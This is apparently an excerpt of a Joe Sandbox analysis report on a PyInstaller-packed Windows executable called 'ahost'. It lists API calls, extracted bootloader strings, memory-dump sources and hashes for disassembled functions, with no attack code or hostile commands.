                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E58A4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E58B6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E58CF
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E58E1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E58FD
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E590F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E592B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E593D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5959
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E596B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5987
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E5999
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E59B5
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7F91E64BF,?,00007FF7F91E336E), ref: 00007FF7F91E59C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                              • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction ID: 8a7849a82723bfcecd497cad4d0fbcc695c858c574f06ec15a894f2eb5cd99b8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC227564D0AB0792FFA5FF56BC245B8A271AF04745FC45035C83E826E8AF3DB55882A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F91E45E4,00000000,00007FF7F91E1985), ref: 00007FF7F91E9439
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7F91E88A7,?,?,00000000,00007FF7F91E3CBB), ref: 00007FF7F91E821C
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E2810: MessageBoxW.USER32 ref: 00007FF7F91E28EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                              • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                              • Instruction ID: 998338be0356ef53edad8c5234d32c8da0b73fda9f7c5dc7afbe5a0bed39e020
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C517511E2964342FB55BF25FC516BAE2B1AF94780FC44431D62E826EDEE2CF40583E1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction ID: c36f94774f6ab4f024c77e6b184c67509492e4bd331c5dfa153205433277ec1a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6251C6266047A186DB34AF26A8181BEB7B1FB98B61F404135EBDF83694DF3CD145D720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                              • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                              • Instruction ID: 0d5e09195ada8f8de3e41a28db76bcfe6e00167d71bbc4f07f0f75b32d236e3d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10216721E09A4282FB957F7ABC5417DE270EF88B90F984171DA3E837ECDE2CD5548261
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction ID: 3f16a011aafa4bf8f99b7e5f5abe6c6527e1760d4a1e3a758ce7a3956ad42edd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8128362E0814F86FB247E14B954279F6B9FB50798FC84135D7B9466CCEB3CE5408BA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction ID: f582ab8ce527e6209ae5e150f16bac7de49aaafc247ac72583af92d32b6401dc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9128262E0C14B85FB30AE15B854679F271EB8176CFD84135D7B946ACCEB7CE4848BA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 53d1e4d2edf0062f7230160cf0d8e608199b832438cf6a3aedd647e8abf4d892
                                                                                                                                                                                                                              • Instruction ID: d863c14b0d52ecf5c9c908104776dedebb8e2306d4475c6314320dc060317d0e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53d1e4d2edf0062f7230160cf0d8e608199b832438cf6a3aedd647e8abf4d892
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1413C21E0865682FB20FF25BC046B9A3A1AF44B84FD44431EE6E477D9DE3CF50187A1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 9c0a33a636d22d269d029a952bcb6a186b4f055325f6749c3ab7856a71983fc4
                                                                                                                                                                                                                              • Instruction ID: e9e12ab08463cda390116e236c683fadd9e20ed62b8bef6d5921ca872d575994
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c0a33a636d22d269d029a952bcb6a186b4f055325f6749c3ab7856a71983fc4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C414021E0864686FB20FF21A8415B9A3A0AF45794FC44532EE6E477DDDE3CF5418BA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                              • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                              • Instruction ID: 5bb8beb5652ff88e3a8c2e704395b0bc10e311342c33df1e193f6f55d6a44f28
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8D16C22E0864187EB21BF65A8403AEA7B0FB45788F940135EE5D57BD9DF78F090C792
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2C9E
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2D63
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF7F91E2D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                              • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                              • Instruction ID: 968e6561d5ca9252b9187ce52e3381e71b3dcd33bc4c7334633531accefcc7f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1831B722B0864142FB20BF15BC146AAA6A5BF88798F800135EF5E937ADDE3CE546C350
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F91EDFEA,?,?,?,00007FF7F91EDCDC,?,?,?,00007FF7F91ED8D9), ref: 00007FF7F91EDDBD
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7F91EDFEA,?,?,?,00007FF7F91EDCDC,?,?,?,00007FF7F91ED8D9), ref: 00007FF7F91EDDCB
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F91EDFEA,?,?,?,00007FF7F91EDCDC,?,?,?,00007FF7F91ED8D9), ref: 00007FF7F91EDDF5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF7F91EDFEA,?,?,?,00007FF7F91EDCDC,?,?,?,00007FF7F91ED8D9), ref: 00007FF7F91EDE63
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF7F91EDFEA,?,?,?,00007FF7F91EDCDC,?,?,?,00007FF7F91ED8D9), ref: 00007FF7F91EDE6F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                              • Instruction ID: 32449817985e2651eab51535a801100a84499cb2a7a6ef47191ce9990a40117f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E318125F1A60686EF61BF02BD04565A3A4BF54BA0F8A4535ED3D473D8DF3CF44882A1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                              • Instruction ID: 402d2aa6ff56c8e95c932c549241a57d5b5cb113419b88899dc7a8fd74ebe2e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0413961E0868692EB15FF24F8142E9A371BB54380FC00132EA6D436D9EE3CF615C3A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7F91E351A,?,00000000,00007FF7F91E3F23), ref: 00007FF7F91E2AA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
